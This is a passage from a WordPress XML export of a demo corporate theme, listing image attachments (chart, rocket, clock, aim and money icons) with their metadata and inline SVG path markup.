		<wp:post_date><![CDATA[2020-09-09 07:44:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:44:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bars-chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bars-chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bars-chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>rocket</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/rocket/</link>
		<pubDate>Wed, 09 Sep 2020 07:46:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/rocket.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>649</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:46:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:46:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[rocket]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/rocket.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/rocket.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/chart/</link>
		<pubDate>Wed, 09 Sep 2020 08:11:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>653</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:11:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:11:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>clock</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/clock/</link>
		<pubDate>Wed, 09 Sep 2020 08:23:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/clock.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>659</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:23:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:23:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[clock]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/clock.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/clock.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>aim</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/aim/</link>
		<pubDate>Wed, 09 Sep 2020 08:24:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/aim.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>660</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:24:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:24:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[aim]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/aim.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/aim.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>money</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/money/</link>
		<pubDate>Wed, 09 Sep 2020 08:25:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/money.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>663</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:25:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:25:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/money.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/money.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
